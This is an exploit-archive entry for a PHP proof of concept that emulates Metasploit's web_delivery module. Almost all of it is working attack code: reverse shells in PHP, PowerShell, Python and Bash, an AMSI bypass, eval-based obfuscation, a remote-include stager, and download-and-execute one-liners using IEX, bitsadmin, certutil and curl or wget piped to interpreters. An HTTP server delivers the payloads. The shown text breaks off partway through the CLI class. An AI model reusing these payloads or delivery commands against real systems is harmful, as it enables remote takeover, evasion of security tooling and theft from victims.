{“lastseen”:”2026-01-21T15:44:10″,”description”:”This project presents an advanced proof of concept that emulates the behavior of Metasploit’s multi\/script\/webdelivery module using PHP. The goal is to demonstrate how script-based payload delivery works in a modular and extensible way, without relying…”,”published”:”2026-01-21T00:00:00″,”modified”:”2026-01-21T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Metasploit Web Delivery PHP Proof of Concept”,”source”:””,”references”:””,”id”:”PACKETSTORM:214116″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Metasploit Script Web Delivery Payload Delivery Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/script\/web_delivery\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/208942\/\\n \\n [+] Summary : This project presents an advanced proof-of-concept (PoC) that emulates the behavior of Metasploit\u2019s multi\/script\/web_delivery module using PHP. \\n The goal is to demonstrate how script-based payload delivery works in a modular and extensible way, without relying directly on Metasploit.\\n The script launches a lightweight HTTP delivery service and dynamically generates one-liner execution commands for multiple platforms and interpreters. \\n \\t\\t\\t When executed on a target system (through an existing execution vector such as RCE, command injection, or local access), these commands retrieve payloads from the server and execute them, typically in memory.\\n \\n [+] Key characteristics of the PoC include:\\n \\n Multi-language and multi-platform support: PHP, Python, PowerShell, Bash, Linux, macOS, and Windows Living-Off-The-Land binaries.\\n \\n Dynamic payload generation with configurable listener parameters (LHOST\/LPORT).\\n \\n Obfuscation and evasion techniques, including layered encoding and optional AMSI bypass logic for PowerShell.\\n \\n Session tracking and basic telemetry, such as request counts, active sessions, and rate limiting.\\n \\n Modular architecture, separating concerns into payload generation, obfuscation, HTTP handling, session management, and CLI interaction.\\n \\n Operator-friendly CLI interface that displays ready-to-use delivery commands similar to Metasploit\u2019s output.\\n \\n It supports the following delivery targets:\\n \\n PHP\\n \\n Python\\n \\n PowerShell (with TLS enforcement \/ AMSI bypass \/ encoded payload)\\n \\n Regsvr32 Squiblydoo\\n \\n pubprn.vbs\\n \\n SyncAppvPublishingServer\\n \\n Linux (wget)\\n \\n macOS (curl)\\n \\n The script dynamically builds the execution commands and prints them to the operator, while the server simulates payload distribution.\\n Helpers are included for creating payloads, random URIs, GUIDs, SCT templates, and HTTP server responses.\\n \\n It is not a full HTTP server implementation but a framework skeleton showing how delivery is structured and executed, suitable for extension into production or integrated into a backend for automation.\\n \\n [+] POC :\\t\\n \\n \\u003c?php\\n \/**\\n * by indoushka\\n * Advanced Web Delivery with Multiple Delivery Methods\\n *\/\\n \\n \/\/ ========================\\n \/\/ Enhanced Configuration\\n \/\/ ========================\\n $config = [\\n ‘version’ =\\u003e ‘2.0’,\\n ‘defaults’ =\\u003e [\\n ‘target’ =\\u003e ‘PSH’,\\n ‘server_host’ =\\u003e ‘0.0.0.0’,\\n ‘server_port’ =\\u003e 8080,\\n ‘lhost’ =\\u003e ‘127.0.0.1’,\\n ‘lport’ =\\u003e 4444,\\n ‘protocol’ =\\u003e ‘http’,\\n ‘obfuscation’ =\\u003e true,\\n ‘encryption’ =\\u003e false,\\n ‘rotating_payloads’ =\\u003e true,\\n ‘log_requests’ =\\u003e true,\\n ‘rate_limit’ =\\u003e 100,\\n ‘session_timeout’ =\\u003e 300,\\n ‘stealth_mode’ =\\u003e false,\\n ‘payload_expiry’ =\\u003e 3600,\\n ‘auto_cleanup’ =\\u003e true,\\n ‘multiple_payloads’ =\\u003e [\\n ‘php’ =\\u003e true,\\n ‘python’ =\\u003e true,\\n ‘powershell’ =\\u003e true,\\n ‘bash’ =\\u003e true\\n ]\\n ]\\n ];\\n \\n \/\/ ========================\\n \/\/ Advanced Obfuscation Class\\n \/\/ ========================\\n class AdvancedObfuscator\\n {\\n public static function obfuscate($code, $method = ‘multiple’, $level = 3)\\n {\\n switch ($method) {\\n case ‘base64’:\\n return base64_encode($code);\\n \\n case ‘rot13’:\\n return str_rot13($code);\\n \\n case ‘xor’:\\n $key = bin2hex(random_bytes(8));\\n $encrypted = ”;\\n for ($i = 0; $i \\u003c strlen($code); $i++) {\\n $encrypted .= $code[$i] ^ $key[$i % strlen($key)];\\n }\\n return base64_encode($encrypted) . ‘|’ . $key;\\n \\n case ‘gzip’:\\n return base64_encode(gzcompress($code, 9));\\n \\n case ‘multiple’:\\n for ($i = 0; $i \\u003c $level; $i++) {\\n $code = self::applyRandomObfuscation($code);\\n }\\n return $code;\\n \\n default:\\n return $code;\\n }\\n }\\n \\n private static function applyRandomObfuscation($code)\\n {\\n $methods = [‘base64’, ‘rot13’, ‘gzip’];\\n $method = $methods[array_rand($methods)];\\n \\n switch ($method) {\\n case ‘base64’:\\n return ‘eval(base64_decode(\\”‘ . base64_encode($code) . ‘\\”));’;\\n \\n case ‘rot13’:\\n return ‘eval(str_rot13(\\”‘ . str_rot13($code) . ‘\\”));’;\\n \\n case ‘gzip’:\\n return ‘eval(gzuncompress(base64_decode(\\”‘ . base64_encode(gzcompress($code)) . ‘\\”)));’;\\n \\n default:\\n return $code;\\n }\\n }\\n }\\n \\n \/\/ ========================\\n \/\/ Session Manager Class\\n \/\/ ========================\\n class SessionManager\\n {\\n private static $sessions = [];\\n private static $logFile = ‘sessions.log’;\\n \\n public static function createSession($ip, $userAgent, $target)\\n {\\n $sessionId = bin2hex(random_bytes(16));\\n $session = [\\n ‘id’ =\\u003e $sessionId,\\n ‘ip’ =\\u003e $ip,\\n ‘user_agent’ =\\u003e $userAgent,\\n ‘target’ =\\u003e $target,\\n ‘created’ =\\u003e time(),\\n ‘last_activity’ =\\u003e time(),\\n ‘request_count’ =\\u003e 1,\\n ‘payload_delivered’ =\\u003e false,\\n ‘active’ =\\u003e true\\n ];\\n \\n self::$sessions[$sessionId] = $session;\\n self::logSession($session, ‘CREATED’);\\n \\n return $sessionId;\\n }\\n \\n public static function updateSession($sessionId)\\n {\\n if (isset(self::$sessions[$sessionId])) {\\n self::$sessions[$sessionId][‘last_activity’] = time();\\n self::$sessions[$sessionId][‘request_count’]++;\\n }\\n }\\n \\n public static function markPayloadDelivered($sessionId)\\n {\\n if (isset(self::$sessions[$sessionId])) {\\n self::$sessions[$sessionId][‘payload_delivered’] = true;\\n self::logSession(self::$sessions[$sessionId], ‘PAYLOAD_DELIVERED’);\\n }\\n }\\n \\n public static function getActiveSessions()\\n {\\n $active = [];\\n foreach (self::$sessions as $session) {\\n if ($session[‘active’] \\u0026\\u0026 (time() – $session[‘last_activity’]) \\u003c 300) {\\n $active[] = $session;\\n }\\n }\\n return $active;\\n }\\n \\n private static function logSession($session, $action)\\n {\\n $logEntry = sprintf(\\n \\”[%s] %s – Session: %s, IP: %s, Target: %s\\\\n\\”,\\n date(‘Y-m-d H:i:s’),\\n $action,\\n $session[‘id’],\\n $session[‘ip’],\\n $session[‘target’]\\n );\\n \\n @file_put_contents(self::$logFile, $logEntry, FILE_APPEND);\\n }\\n }\\n \\n \/\/ ========================\\n \/\/ Advanced Payload Generator Class\\n \/\/ ========================\\n class AdvancedPayloadGenerator\\n {\\n public static function generatePayload($type, $params)\\n {\\n $method = ‘generate’ . ucfirst(strtolower($type)) . ‘Payload’;\\n \\n if (method_exists(__CLASS__, $method)) {\\n return self::$method($params);\\n }\\n \\n return self::generateGenericPayload($params);\\n }\\n \\n private static function generatePhpPayload($params)\\n {\\n $payloads = [\\n ‘basic’ =\\u003e ‘\\u003c?php $s=fsockopen(\\”{{LHOST}}\\”,{{LPORT}});exec(\\”\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\”);?\\u003e’,\\n ‘advanced’ =\\u003e ‘\\u003c?php $c=base64_decode(\\”{{ENCODED}}\\”);eval($c);?\\u003e’,\\n ‘stealth’ =\\u003e ‘\\u003c?php $f=tempnam(sys_get_temp_dir(),\\”x\\”);file_put_contents($f,file_get_contents(\\”{{URL}}\\”));include($f);unlink($f);?\\u003e’\\n ];\\n \\n $selected = $payloads[$params[‘variant’] ?? ‘basic’];\\n return str_replace(\\n [‘{{LHOST}}’, ‘{{LPORT}}’, ‘{{ENCODED}}’, ‘{{URL}}’],\\n [$params[‘lhost’], $params[‘lport’], base64_encode($selected), $params[‘server_url’]],\\n $selected\\n );\\n }\\n \\n private static function generatePowershellPayload($params)\\n {\\n $amsiBypass = ‘\\n # AMSI Bypass\\n $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like \\”*iUtils\\”) {$c=$b}};$d=$c.GetFields(\\”NonPublic,Static\\”);Foreach($e in $d) {if ($e.Name -like \\”*Context\\”) {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf=@(0);[System.Runtime.InteropServices.Marshal]::Copy($buf,0,$ptr,1)\\n ‘;\\n \\n $payload = ‘\\n # Reverse Shell\\n $client = New-Object System.Net.Sockets.TCPClient(\\”{{LHOST}}\\”,{{LPORT}});\\n $stream = $client.GetStream();\\n [byte[]]$bytes = 0..65535|%{0};\\n while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){\\n $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\\n $sendback = (iex $data 2\\u003e\\u00261 | Out-String );\\n $sendback2 = $sendback + \\”PS \\” + (pwd).Path + \\”\\u003e \\”;\\n $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\\n $stream.Write($sendbyte,0,$sendbyte.Length);\\n $stream.Flush()\\n };\\n $client.Close()\\n ‘;\\n \\n if ($params[‘amsi_bypass’] ?? true) {\\n $payload = $amsiBypass . $payload;\\n }\\n \\n if ($params[‘obfuscate’] ?? true) {\\n $payload = self::obfuscatePowerShell($payload);\\n }\\n \\n return str_replace(\\n [‘{{LHOST}}’, ‘{{LPORT}}’],\\n [$params[‘lhost’], $params[‘lport’]],\\n $payload\\n );\\n }\\n \\n private static function obfuscatePowerShell($code)\\n {\\n $code = str_replace(‘ ‘, ‘` ‘, $code);\\n $code = str_replace(‘-‘, ‘`-‘, $code);\\n $code = str_replace(‘$’, ‘`$’, $code);\\n $code = str_replace(‘.’, ‘`.’, $code);\\n \\n return $code;\\n }\\n \\n private static function generatePythonPayload($params)\\n {\\n return ‘\\n import socket,subprocess,os,pty\\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\n s.connect((\\”{{LHOST}}\\”,{{LPORT}}))\\n os.dup2(s.fileno(),0)\\n os.dup2(s.fileno(),1)\\n os.dup2(s.fileno(),2)\\n pty.spawn(\\”\/bin\/bash\\”)\\n ‘;\\n }\\n \\n private static function generateBashPayload($params)\\n {\\n return ‘bash -i \\u003e\\u0026 \/dev\/tcp\/{{LHOST}}\/{{LPORT}} 0\\u003e\\u00261’;\\n }\\n \\n private static function generateGenericPayload($params)\\n {\\n return \\”echo ‘Unsupported payload type: {$params[‘type’]}’\\”;\\n }\\n }\\n \\n \/\/ ========================\\n \/\/ Enhanced HTTP Server Class\\n \/\/ ========================\\n class EnhancedHttpServer\\n {\\n private $host;\\n private $port;\\n private $handler;\\n private $socket;\\n private $stats;\\n private $rateLimiter;\\n \\n public function __construct($host = ‘0.0.0.0’, $port = 8080)\\n {\\n $this-\\u003ehost = $host;\\n $this-\\u003eport = $port;\\n $this-\\u003estats = [\\n ‘requests’ =\\u003e 0,\\n ‘payloads_served’ =\\u003e 0,\\n ‘blocked_requests’ =\\u003e 0,\\n ‘start_time’ =\\u003e time()\\n ];\\n $this-\\u003erateLimiter = new RateLimiter();\\n }\\n \\n public function setHandler($handler)\\n {\\n $this-\\u003ehandler = $handler;\\n }\\n \\n public function start()\\n {\\n $context = stream_context_create();\\n \\n $this-\\u003esocket = stream_socket_server(\\n \\”tcp:\/\/{$this-\\u003ehost}:{$this-\\u003eport}\\”,\\n $errno,\\n $errstr,\\n STREAM_SERVER_BIND | STREAM_SERVER_LISTEN,\\n $context\\n );\\n \\n if (!$this-\\u003esocket) {\\n die(\\”Error: {$errstr} ({$errno})\\\\n\\”);\\n }\\n \\n stream_set_blocking($this-\\u003esocket, 0);\\n \\n echo \\”[+] Enhanced HTTP Server started on {$this-\\u003ehost}:{$this-\\u003eport}\\\\n\\”;\\n echo \\”[+] PID: \\” . getmypid() . \\”\\\\n\\”;\\n \\n $this-\\u003emainLoop();\\n }\\n \\n private function mainLoop()\\n {\\n while (true) {\\n $client = @stream_socket_accept($this-\\u003esocket, 0);\\n \\n if ($client) {\\n $this-\\u003ehandleClient($client);\\n }\\n \\n $this-\\u003ecleanup();\\n usleep(10000);\\n }\\n }\\n \\n private function handleClient($client)\\n {\\n $request = ”;\\n $headers = [];\\n $clientIp = stream_socket_get_name($client, true);\\n \\n stream_set_timeout($client, 5);\\n \\n while (!feof($client)) {\\n $request .= fread($client, 8192);\\n if (strpos($request, \\”\\\\r\\\\n\\\\r\\\\n\\”) !== false) {\\n break;\\n }\\n }\\n \\n if (empty($request)) {\\n fclose($client);\\n return;\\n }\\n \\n $lines = explode(\\”\\\\r\\\\n\\”, $request);\\n $requestLine = $lines[0];\\n $method = explode(‘ ‘, $requestLine)[0] ?? ”;\\n $path = explode(‘ ‘, $requestLine)[1] ?? ‘\/’;\\n \\n foreach ($lines as $line) {\\n if (strpos($line, ‘: ‘) !== false) {\\n list($key, $value) = explode(‘: ‘, $line, 2);\\n $headers[strtolower($key)] = $value;\\n }\\n }\\n \\n $userAgent = $headers[‘user-agent’] ?? ‘Unknown’;\\n \\n if (!$this-\\u003erateLimiter-\\u003echeck($clientIp)) {\\n $this-\\u003estats[‘blocked_requests’]++;\\n $response = \\”HTTP\/1.1 429 Too Many Requests\\\\r\\\\n\\”;\\n $response .= \\”Content-Type: text\/plain\\\\r\\\\n\\”;\\n $response .= \\”Content-Length: 18\\\\r\\\\n\\”;\\n $response .= \\”Connection: close\\\\r\\\\n\\\\r\\\\n\\”;\\n $response .= \\”Rate limit exceeded\\”;\\n fwrite($client, $response);\\n fclose($client);\\n return;\\n }\\n \\n $this-\\u003estats[‘requests’]++;\\n \\n if ($this-\\u003ehandler) {\\n $response = call_user_func($this-\\u003ehandler, $request, [\\n ‘ip’ =\\u003e $clientIp,\\n ‘path’ =\\u003e $path,\\n ‘method’ =\\u003e $method,\\n ‘headers’ =\\u003e $headers,\\n ‘user_agent’ =\\u003e $userAgent\\n ]);\\n \\n if (strpos($response, ‘200 OK’) !== false) {\\n $this-\\u003estats[‘payloads_served’]++;\\n }\\n \\n fwrite($client, $response);\\n }\\n \\n fclose($client);\\n }\\n \\n public function getStats()\\n {\\n $uptime = time() – $this-\\u003estats[‘start_time’];\\n return [\\n ‘uptime’ =\\u003e $this-\\u003eformatUptime($uptime),\\n ‘requests’ =\\u003e $this-\\u003estats[‘requests’],\\n ‘payloads_served’ =\\u003e $this-\\u003estats[‘payloads_served’],\\n ‘blocked_requests’ =\\u003e $this-\\u003estats[‘blocked_requests’],\\n ‘requests_per_minute’ =\\u003e $this-\\u003estats[‘requests’] \/ ($uptime \/ 60),\\n ‘active_sessions’ =\\u003e count(SessionManager::getActiveSessions())\\n ];\\n }\\n \\n private function formatUptime($seconds)\\n {\\n $hours = floor($seconds \/ 3600);\\n $minutes = floor(($seconds % 3600) \/ 60);\\n $seconds = $seconds % 60;\\n \\n return sprintf(\\”%02d:%02d:%02d\\”, $hours, $minutes, $seconds);\\n }\\n \\n private function cleanup()\\n {\\n static $lastCleanup = 0;\\n if (time() – $lastCleanup \\u003e 60) {\\n $lastCleanup = time();\\n }\\n }\\n }\\n \\n \/\/ ========================\\n \/\/ Rate Limiter Class\\n \/\/ ========================\\n class RateLimiter\\n {\\n private $requests = [];\\n private $limit = 100;\\n private $window = 60;\\n \\n public function check($ip)\\n {\\n $now = time();\\n $key = $ip . ‘_’ . floor($now \/ $this-\\u003ewindow);\\n \\n if (!isset($this-\\u003erequests[$key])) {\\n $this-\\u003erequests[$key] = 0;\\n }\\n \\n $this-\\u003erequests[$key]++;\\n \\n foreach (array_keys($this-\\u003erequests) as $k) {\\n if (strpos($k, ‘_’) !== false) {\\n list($ipPart, $windowPart) = explode(‘_’, $k);\\n if ($windowPart \\u003c floor(($now – $this-\\u003ewindow) \/ $this-\\u003ewindow)) {\\n unset($this-\\u003erequests[$k]);\\n }\\n }\\n }\\n \\n return $this-\\u003erequests[$key] \\u003c= $this-\\u003elimit;\\n }\\n }\\n \\n \/\/ ========================\\n \/\/ Advanced Web Delivery Class\\n \/\/ ========================\\n class AdvancedWebDelivery\\n {\\n private $config;\\n private $server;\\n private $payloads;\\n private $deliveryMethods;\\n \\n public function __construct($options = [])\\n {\\n global $config;\\n $this-\\u003econfig = array_merge($config[‘defaults’], $options);\\n $this-\\u003eserver = new EnhancedHttpServer(\\n $this-\\u003econfig[‘server_host’],\\n $this-\\u003econfig[‘server_port’]\\n );\\n \\n $this-\\u003eserver-\\u003esetHandler([$this, ‘handleRequest’]);\\n $this-\\u003einitializeDeliveryMethods();\\n $this-\\u003einitializePayloads();\\n }\\n \\n private function initializeDeliveryMethods()\\n {\\n $this-\\u003edeliveryMethods = [\\n ‘psh’ =\\u003e [\\n ‘IEX’ =\\u003e \\”powershell -nop -w hidden -c \\\\\\”IEX(New-Object Net.WebClient).DownloadString(‘{{URL}}’)\\\\\\”\\”,\\n ‘IEX_encoded’ =\\u003e \\”powershell -nop -w hidden -EncodedCommand {{ENCODED}}\\”,\\n ‘bitsadmin’ =\\u003e \\”bitsadmin \/transfer job \/download \/priority normal {{URL}} %temp%\\\\\\\\file.ps1 \\u0026\\u0026 powershell -ep bypass -file %temp%\\\\\\\\file.ps1\\”,\\n ‘certutil’ =\\u003e \\”certutil -urlcache -split -f {{URL}} %temp%\\\\\\\\file.ps1 \\u0026\\u0026 powershell -ep bypass -file %temp%\\\\\\\\file.ps1\\”\\n ],\\n ‘php’ =\\u003e [\\n ‘basic’ =\\u003e \\”php -r \\\\\\”eval(file_get_contents(‘{{URL}}’));\\\\\\”\\”,\\n ‘curl’ =\\u003e \\”curl -s {{URL}} | php\\”,\\n ‘wget’ =\\u003e \\”wget -qO- {{URL}} | php\\”\\n ],\\n ‘python’ =\\u003e [\\n ‘basic’ =\\u003e \\”python -c \\\\\\”import urllib.request; exec(urllib.request.urlopen(‘{{URL}}’).read())\\\\\\”\\”,\\n ‘curl’ =\\u003e \\”curl -s {{URL}} | python\\”,\\n ‘wget’ =\\u003e \\”wget -qO- {{URL}} | python\\”\\n ],\\n ‘bash’ =\\u003e [\\n ‘curl’ =\\u003e \\”curl -s {{URL}} | bash\\”,\\n ‘wget’ =\\u003e \\”wget -qO- {{URL}} | bash\\”\\n ]\\n ];\\n }\\n \\n private function initializePayloads()\\n {\\n $params = [\\n ‘lhost’ =\\u003e $this-\\u003econfig[‘lhost’],\\n ‘lport’ =\\u003e $this-\\u003econfig[‘lport’],\\n ‘server_url’ =\\u003e $this-\\u003egetServerUrl(),\\n ‘amsi_bypass’ =\\u003e true,\\n ‘obfuscate’ =\\u003e $this-\\u003econfig[‘obfuscation’]\\n ];\\n \\n $this-\\u003epayloads = [];\\n foreach ($this-\\u003econfig[‘multiple_payloads’] as $type =\\u003e $enabled) {\\n if ($enabled) {\\n $this-\\u003epayloads[$type] = AdvancedPayloadGenerator::generatePayload($type, $params);\\n }\\n }\\n }\\n \\n public function run()\\n {\\n $this-\\u003eshowAdvancedBanner();\\n $this-\\u003eshowDeliveryOptions();\\n $this-\\u003eserver-\\u003estart();\\n }\\n \\n private function showAdvancedBanner()\\n {\\n $banner = \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 \u2551\\n \u2551 Advanced Script Web Delivery System \u2551\\n \u2551 by indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”;\\n \\n echo $banner . \\”\\\\n\\”;\\n echo \\”[*] Server URL: \\” . $this-\\u003egetServerUrl() . \\”\\\\n\\”;\\n echo \\”[*] Listener: \\” . $this-\\u003econfig[‘lhost’] . \\”:\\” . $this-\\u003econfig[‘lport’] . \\”\\\\n\\”;\\n echo \\”[*] Target: \\” . $this-\\u003econfig[‘target’] . \\”\\\\n\\”;\\n echo \\”[*] Obfuscation: \\” . ($this-\\u003econfig[‘obfuscation’] ? \\”Enabled\\” : \\”Disabled\\”) . \\”\\\\n\\”;\\n echo \\”[*] Stealth Mode: \\” . ($this-\\u003econfig[‘stealth_mode’] ? \\”Enabled\\” : \\”Disabled\\”) . \\”\\\\n\\”;\\n echo str_repeat(\\”=\\”, 80) . \\”\\\\n\\\\n\\”;\\n }\\n \\n private function showDeliveryOptions()\\n {\\n echo \\”[*] Available Delivery Commands:\\\\n\\”;\\n echo str_repeat(\\”-\\”, 80) . \\”\\\\n\\”;\\n \\n $target = strtolower($this-\\u003econfig[‘target’]);\\n $url = $this-\\u003egetServerUrl();\\n \\n if (isset($this-\\u003edeliveryMethods[$target])) {\\n foreach ($this-\\u003edeliveryMethods[$target] as $method =\\u003e $command) {\\n $finalCommand = str_replace(‘{{URL}}’, $url, $command);\\n \\n if (strpos($command, ‘{{ENCODED}}’) !== false) {\\n $encoded = base64_encode(\\n \\”IEX(New-Object Net.WebClient).DownloadString(‘{$url}’)\\”\\n );\\n $finalCommand = str_replace(‘{{ENCODED}}’, $encoded, $finalCommand);\\n }\\n \\n echo \\”[{$method}]\\\\n\\”;\\n echo $finalCommand . \\”\\\\n\\\\n\\”;\\n }\\n } else {\\n echo \\”[!] No delivery methods available for target: {$target}\\\\n\\”;\\n }\\n \\n echo str_repeat(\\”=\\”, 80) . \\”\\\\n\\\\n\\”;\\n }\\n \\n private function getServerUrl()\\n {\\n $protocol = $this-\\u003econfig[‘protocol’] ?? ‘http’;\\n return $protocol . ‘:\/\/’ . $this-\\u003econfig[‘server_host’] . ‘:’ . $this-\\u003econfig[‘server_port’];\\n }\\n \\n public function handleRequest($request, $clientInfo = [])\\n {\\n $path = $clientInfo[‘path’] ?? ‘\/’;\\n $ip = $clientInfo[‘ip’] ?? ‘0.0.0.0’;\\n $userAgent = $clientInfo[‘user_agent’] ?? ‘Unknown’;\\n \\n static $sessions = [];\\n $sessionKey = md5($ip . $userAgent);\\n \\n if (!isset($sessions[$sessionKey])) {\\n $sessions[$sessionKey] = [\\n ‘id’ =\\u003e bin2hex(random_bytes(8)),\\n ‘ip’ =\\u003e $ip,\\n ‘user_agent’ =\\u003e $userAgent,\\n ‘created’ =\\u003e time(),\\n ‘requests’ =\\u003e 1,\\n ‘paths’ =\\u003e [$path]\\n ];\\n } else {\\n $sessions[$sessionKey][‘requests’]++;\\n $sessions[$sessionKey][‘paths’][] = $path;\\n }\\n \\n $sessionId = $sessions[$sessionKey][‘id’];\\n \\n echo sprintf(\\n \\”[%s] %s – %s – %s\\\\n\\”,\\n date(‘H:i:s’),\\n $ip,\\n $path,\\n $userAgent\\n );\\n \\n if (strpos($path, ‘\/payload\/’) === 0) {\\n return $this-\\u003ehandlePayloadRequest($path, $sessionId);\\n } elseif (strpos($path, ‘\/bypass’) !== false) {\\n return $this-\\u003ehandleAmsiBypass();\\n } elseif (strpos($path, ‘\/stats’) !== false) {\\n return $this-\\u003ehandleStatsRequest();\\n } elseif ($path === ‘\/’) {\\n return $this-\\u003ehandleIndex();\\n } else {\\n return $this-\\u003ehandle404();\\n }\\n }\\n \\n private function handlePayloadRequest($path, $sessionId)\\n {\\n $parts = explode(‘\/’, $path);\\n $payloadType = $parts[2] ?? strtolower($this-\\u003econfig[‘target’]);\\n \\n if (isset($this-\\u003epayloads[$payloadType])) {\\n $payload = $this-\\u003epayloads[$payloadType];\\n \\n if ($this-\\u003econfig[‘obfuscation’]) {\\n $payload = AdvancedObfuscator::obfuscate($payload, ‘multiple’, 2);\\n }\\n \\n echo \\”[+] Delivering {$payloadType} payload to session: {$sessionId}\\\\n\\”;\\n \\n return $this-\\u003ecreateResponse(200, $payload, ‘text\/plain’, [\\n ‘X-Payload-Type’ =\\u003e $payloadType,\\n ‘X-Session-ID’ =\\u003e $sessionId\\n ]);\\n }\\n \\n return $this-\\u003ecreateResponse(404, ‘Payload not found’);\\n }\\n \\n private function handleAmsiBypass()\\n {\\n $bypass = ‘\\n # Advanced AMSI Bypass\\n $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like \\”*iUtils\\”) {$c=$b}};\\n $d=$c.GetFields(\\”NonPublic,Static\\”);Foreach($e in $d) {if ($e.Name -like \\”*Context\\”) {$f=$e}};\\n $g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf=@(0);\\n [System.Runtime.InteropServices.Marshal]::Copy($buf,0,$ptr,1);\\n ‘;\\n \\n return $this-\\u003ecreateResponse(200, $bypass, ‘text\/plain’);\\n }\\n \\n private function handleStatsRequest()\\n {\\n $stats = $this-\\u003eserver-\\u003egetStats();\\n $html = \\”\\u003ch1\\u003eServer Statistics\\u003c\/h1\\u003e\\u003cpre\\u003e\\” . print_r($stats, true) . \\”\\u003c\/pre\\u003e\\”;\\n return $this-\\u003ecreateResponse(200, $html, ‘text\/html’);\\n }\\n \\n private function handleIndex()\\n {\\n $html = \\”\\n \\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eScript Delivery\\u003c\/title\\u003e\\n \\u003cstyle\\u003e\\n body { font-family: Arial, sans-serif; margin: 40px; }\\n .container { max-width: 800px; margin: auto; }\\n .box { border: 1px solid #ccc; padding: 20px; margin: 10px 0; }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=’container’\\u003e\\n \\u003ch1\\u003eScript Web Delivery System\\u003c\/h1\\u003e\\n \\u003cp\\u003eThis is a legitimate web server for authorized testing purposes.\\u003c\/p\\u003e\\n \\u003cdiv class=’box’\\u003e\\n \\u003ch3\\u003eAvailable Payloads:\\u003c\/h3\\u003e\\n \\u003cul\\u003e\\n \\”;\\n \\n foreach (array_keys($this-\\u003epayloads) as $type) {\\n $html .= \\”\\u003cli\\u003e\\u003ca href=’\/payload\/{$type}’\\u003eDownload {$type} payload\\u003c\/a\\u003e\\u003c\/li\\u003e\\”;\\n }\\n \\n $html .= \\”\\n \\u003c\/ul\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\”;\\n \\n return $this-\\u003ecreateResponse(200, $html, ‘text\/html’);\\n }\\n \\n private function handle404()\\n {\\n return $this-\\u003ecreateResponse(404, ‘Not Found’);\\n }\\n \\n private function createResponse($status, $content, $contentType = ‘text\/html’, $customHeaders = [])\\n {\\n $statusText = [\\n 200 =\\u003e ‘OK’,\\n 404 =\\u003e ‘Not Found’,\\n 429 =\\u003e ‘Too Many Requests’\\n ][$status] ?? ‘OK’;\\n \\n $response = \\”HTTP\/1.1 {$status} {$statusText}\\\\r\\\\n\\”;\\n $response .= \\”Content-Type: {$contentType}\\\\r\\\\n\\”;\\n $response .= \\”Content-Length: \\” . strlen($content) . \\”\\\\r\\\\n\\”;\\n $response .= \\”Connection: close\\\\r\\\\n\\”;\\n \\n foreach ($customHeaders as $key =\\u003e $value) {\\n $response .= \\”{$key}: {$value}\\\\r\\\\n\\”;\\n }\\n \\n $response .= \\”\\\\r\\\\n\\” . $content;\\n \\n return $response;\\n }\\n }\\n \\n \/\/ ========================\\n \/\/ Enhanced CLI Interface\\n \/\/ ========================\\n class EnhancedCliInterface\\n {\\n public static function run()\\n {\\n self::showWelcome();\\n \\n $config = [\\n ‘target’ =\\u003e self::promptSelect(\\n \\”Select target language:\\”,\\n [‘PSH’, ‘PHP’, ‘Python’, ‘Bash’],\\n ‘PSH’\\n ),\\n ‘lhost’ =\\u003e self::prompt(\\”Listener IP:\\”, \\”127.0.0.1\\”),\\n ‘lport’ =\\u003e self::prompt(\\”Listener port:\\”, \\”4444\\”),\\n ‘server_host’ =\\u003e self::prompt(\\”Server bind IP:\\”, \\”0.0.0.0\\”),\\n ‘server_port’ =\\u003e self::prompt(\\”Server port:\\”, \\”8080\\”),\\n ‘obfuscation’ =\\u003e self::promptYesNo(\\”Enable obfuscation?\\”, true),\\n ‘stealth_mode’ =\\u003e self::promptYesNo(\\”Enable stealth mode?\\”, false)\\n ];\\n \\n echo \\”\\\\n[+] Configuration complete. Starting server…\\\\n\\”;\\n \\n $webDelivery = new AdvancedWebDelivery($config);\\n $webDelivery-\\u003erun();\\n }\\n 